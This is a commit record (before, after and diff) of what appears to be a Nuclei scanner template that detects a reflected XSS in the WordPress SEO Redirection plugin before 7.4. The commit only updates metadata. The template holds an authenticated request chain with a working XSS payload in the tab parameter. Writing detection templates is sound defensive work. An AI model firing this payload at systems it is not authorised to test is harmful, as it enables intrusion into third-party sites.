vulnerabilities/wordpress/seo-redirection-xss.yaml (before)
id: seo-redirection-xss

info:
  name: WordPress SEO Redirection < 7.4 - Reflected Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    The plugin does not escape the tab parameter before outputting it back in JavaScript code, leading to a Reflected Cross-Site Scripting issue.
  remediation: Fixed in version 7.4.
  reference:
    - https://wpscan.com/vulnerability/b694b9c0-a367-468c-99c2-6ba35bcf21ea
  tags: wordpress,xss,wp-plugin,authenticated,wpscan

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        POST /wp-admin/options-general.php?page=seo-redirection.php&tab=cutom HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        tab=%3C%2Fscript%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3E

      - |
        GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><svg/onload=alert(/XSS/)>"
          - "settings_page_seo-redirection"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

vulnerabilities/wordpress/seo-redirection-xss.yaml (after)
id: seo-redirection-xss

info:
  name: WordPress SEO Redirection <7.4 - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    WordPress SEO Redirection 7.4 does not escape the tab parameter before outputting it back in JavaScript code, leading to a reflected cross-site scripting vulnerability.
  remediation: Fixed in version 7.4.
  reference:
    - https://wpscan.com/vulnerability/b694b9c0-a367-468c-99c2-6ba35bcf21ea
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: wordpress,xss,wp-plugin,authenticated,wpscan

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        POST /wp-admin/options-general.php?page=seo-redirection.php&tab=cutom HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        tab=%3C%2Fscript%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3E

      - |
        GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><svg/onload=alert(/XSS/)>"
          - "settings_page_seo-redirection"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/07

vulnerabilities/wordpress/seo-redirection-xss.yaml (diff)
@@ -1,14 +1,18 @@
 id: seo-redirection-xss
 
 info:
-  name: WordPress SEO Redirection < 7.4 - Reflected Cross-Site Scripting
+  name: WordPress SEO Redirection <7.4 - Cross-Site Scripting
   author: DhiyaneshDK
   severity: medium
   description: |
-    The plugin does not escape the tab parameter before outputting it back in JavaScript code, leading to a Reflected Cross-Site Scripting issue.
+    WordPress SEO Redirection 7.4 does not escape the tab parameter before outputting it back in JavaScript code, leading to a reflected cross-site scripting vulnerability.
   remediation: Fixed in version 7.4.
   reference:
     - https://wpscan.com/vulnerability/b694b9c0-a367-468c-99c2-6ba35bcf21ea
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: wordpress,xss,wp-plugin,authenticated,wpscan
 
 requests:
@@ -52,3 +56,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
